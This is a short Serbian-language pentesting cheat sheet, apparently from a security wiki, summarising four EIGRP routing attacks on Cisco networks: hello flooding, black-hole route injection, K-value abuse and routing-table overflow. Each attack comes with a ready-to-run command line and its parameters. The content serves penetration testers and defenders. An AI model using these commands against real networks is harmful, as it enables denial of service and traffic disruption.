EIGRP Attacks
Ovo je sažetak napada izloženih na https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9. Pogledajte ga za dalje informacije.
Napad lažnih EIGRP suseda
Cilj: Preopteretiti CPU rutera poplavljivanjem EIGRP hello paketima, što može dovesti do napada odbijanja usluge (DoS).
Alat: Skripta helloflooding.py.
Izvršavanje: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%%
Parametri:
--interface
: Određuje mrežni interfejs, npr.eth0
.--as
: Definiše broj autonomnog sistema EIGRP-a, npr.1
.--subnet
: Postavlja lokaciju podmreže, npr.10.10.100.0/24
.
Napad EIGRP crne rupe
Cilj: Ometanje protoka mrežnog saobraćaja ubacivanjem lažne rute, što dovodi do crne rupe gde se saobraćaj usmerava ka nepostojećoj destinaciji.
Alat: Skripta routeinject.py.
Izvršavanje: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%%
Parametri:
--interface
: Određuje interfejs sistema napadača.--as
: Definiše broj EIGRP autonomnog sistema.--src
: Postavlja IP adresu napadača.--dst
: Postavlja IP adresu ciljne podmreže.--prefix
: Definiše masku ciljne IP adrese podmreže.
Zloupotreba napada K-vrednosti
Cilj: Stvaranje kontinuiranih prekida i ponovnih povezivanja unutar EIGRP domena ubacivanjem izmenjenih K-vrednosti, što rezultira napadom DoS.
Alat: Skripta relationshipnightmare.py.
Izvršavanje: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%%
Parametri:
--interface
: Određuje mrežni interfejs.--as
: Definiše broj EIGRP autonomnog sistema.--src
: Postavlja IP adresu legitimnog rutera.
Napad prelivanja tabele rutiranja
Cilj: Opterećenje CPU-a i RAM-a rutera poplavljivanjem tabele rutiranja sa brojnim lažnim rutama.
Alat: Skripta routingtableoverflow.py.
Izvršavanje: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%%
Parametri:
--interface
: Određuje mrežni interfejs.--as
: Definiše broj EIGRP autonomnog sistema.--src
: Postavlja IP adresu napadača.
Last updated